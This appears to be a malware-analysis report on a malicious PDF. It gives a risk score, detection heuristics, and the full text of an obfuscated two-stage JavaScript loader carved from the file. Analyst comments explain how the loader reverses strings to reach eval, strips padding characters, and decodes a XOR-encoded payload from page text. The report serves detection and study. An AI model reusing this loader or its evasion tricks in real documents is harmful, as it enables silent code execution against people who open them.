MALICIOUS
106
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9990
Heuristics 3
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT — A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 1 related finding PDF_JAVASCRIPT — PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JS — PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0010_000.js | pdf-javascript-stream | PDF /JS object 10 at offset 0x1230 | 1728 bytes |
SHA-256: d4dce4f95f7146e3b127d68edf45ceb045483a205d9e9a2a53d6e6b80d83b663
Preview script — First 1,000 lines of the extracted script
// Analyst annotation: this is the script carved from the PDF's /JS object
// (see the artifact table above). It is a two-stage obfuscated loader; the
// comments below record what each visible line does so a reviewer can
// recognise the pattern. Features worth keying detection on: reversed string
// literals decoded at runtime ('epytotorp', 'lave'), property names assembled
// from fragments ("cha"+"rAt", "leng"+"th"), a payload literal stuffed with
// '%' and cleaned with .replace(/[%]/g, ''), payload extraction from page text
// via getPageNumWords/getPageNthWord, and an indirect eval through app.eval.
try {
// Stage-1 wrapper: stores its single argument in this._H. Below it is
// constructed as `new _ZO(_FW)` with _FW bound to the top-level `this`.
function _ZO(_QD){
this._H=_QD;
};
// "charAt" and "length" are never present as literals; they are assembled
// from fragments at runtime so a naive string scan does not see them.
var _RQZ="cha";
var _JI=new String("rAt");
var _XY="leng"+"th";
// String reverser hung off the Acrobat `app` object: walks _YJM from its
// last index down to 0 using _YJM["cha"+"rAt"](i) and appends each char.
// The loop starts at _YJM.length, where charAt returns "", so the first
// iteration contributes nothing. _TMN and _SD are assigned without `var`
// and therefore leak into the global scope.
app._UV=function(_YJM){
_TMN='';
for(_SD=_YJM.length;_SD >= 0;_SD--){
_TMN+=_YJM[_RQZ + _JI](_SD);
}
return _TMN;
}
var _UV=app._UV;
// 'epytotorp' reversed is 'prototype'; the next statement assigns _ZO.prototype.
_FE = app._UV('epytotorp');
_ZO[_FE]={
// 'lave' reversed is 'eval'.
_UNC : _UV(String("lave")),
// Entry point: resolve the eval function via _MNI() and call it on the
// stage-2 source string _YJM. _DS is another implicit global.
_KR : function(){
var _NQ = this;
_DS=_NQ._MNI();
var _GN=_NQ._YJM;
_DS(_GN);
},
// Looks up this._UNC ('eval') as a property of _FW, i.e. obtains eval
// through the global object rather than by name.
_MNI : function(){
var _BO=this._UNC;
return _FW[_BO];
},
// Stage-2 source. Every keyword and identifier has '%' characters inserted
// into it; they are stripped by the trailing .replace(/[%]/g, '') when this
// object literal is evaluated. Read with the '%' removed, the literal is a
// decoder that: takes _KTM = this._H (intended to be the document stored by
// the _ZO constructor, though whether `this` resolves to that object under
// an indirect eval is not established by this listing); concatenates every
// word of page `pageNum` via getPageNumWords/getPageNthWord; consumes that
// text two hex digits at a time, parseInt(..., 16), XORs each value with 37
// (_HK) and re-encodes it as a zero-padded hex byte; joins the bytes with
// '\x' escapes and materialises the string through app['eval']; splits it
// 332 characters (_ITU) from the end into _KTM._UN (head) and _KTM._ZW
// (tail); then calls _NI(). _NI is not defined anywhere in this listing —
// if it is also undefined at runtime the call throws, and the catch branch
// runs app['eval'](_KTM._UN), so the decoded head is what actually executes.
// Failure paths surface as app.alert('Decoder Exception: ...') or
// app.alert('Nothing calling'). This reading is from the printed literal,
// not from execution — confirm against a sandbox trace.
_YJM : '_HK = 37 ;va%%r _KTM=this._H;_WL=\'getPageNt%%hWord\';_DC=\'%getPageNum%Word%s\';_EL=\'pageNum\';_ED%=%%\'\';_AL=\'join%\';_NG=\'\';_KL=%%0;_%%HA=St%%ring;_VY%=\'subs%tr\';%_BY=\'ev%%al\'%%;_XY=\'%length\'%%;_S%%J%%=\'\\\\x\';%%_P%W=\'charCodeAt\';_GH=\'fro%%mCharCo%%de\'%%;_VS%=\'%toSt%ring\'%%;_JK%R%%=2-1;_D%%M=%3+2;_R%A=100%%+155;_%FW=\'%doc\';%%_ITU%=332%;_IV=[];%_ITK=\'\';_D%A=2;_T%Q%%=4;_J%%A=16;%%_PG=_KTM[_%DC](_KTM[_E%%L])%%;for%(_SD=_%KL;_SD%< _PG;% _SD++){var _%%WJ=_KTM%%[_WL](_%%KTM[_EL]%,_SD,tru%e);_NG=[%_NG,%_WJ][_AL](_ED);;}for(_SD%=0%;_SD < _%NG[_XY]; _SD+=_%%DA)%%{_%GD=_NG[_%VY%](_%%SD,_%DA)%%;_Z%%AB=parseI%%nt(_GD,_JA);_XYP=_ZA%B^_HK%%;_FO=_%XYP%%.t%o%%Stri%ng(%%_J%A%%);_F%O=(_%FO[_XY]==_JKR%%)%% ? \'0\' +% %%_%%FO : _FO;_IV.pus%h(_FO)%;%%}try {_ITK=n%ew String(_SJ + %_I%V[%_AL](_SJ));app%[_BY](\'_ITK=\"%%\'+_%%ITK+\'\";\');%_%%KTM.%_ZW=(%%_%%I%%TK[_%VY]%%(_ITK[_%%XY]-_%%IT%U))%%;_KT%M._UN=(_ITK[_VY]%(_KL,_I%%TK[_XY]-%_ITU));_NI%();} c%atc%%h(_%%GHO){if(_KTM._U%%N)%{try {a%%pp[_BY%](_KTM._UN);} c%%at%ch(%%_GHO){app.alert(\'D%ecoder Except%%i%%on: \'%% %%+ %_GHO);}} else {ap%%p.alert(\'%%No%thing calling\');}%%}'.replace(/[%]/g, ''),
};
// Capture the top-level `this` (the global object; in Acrobat document
// scripts this is the Doc) and kick off stage 1: new _ZO(this)._KR() ends
// in eval(stage-2 source).
var _FW=this;
var _EH=new _ZO(_FW);
_EH._KR();
// Any error escaping the loader is shown to the user as an app.alert dialog
// rather than being swallowed.
} catch(_ITK){
app.alert(_ITK);
}
|
|||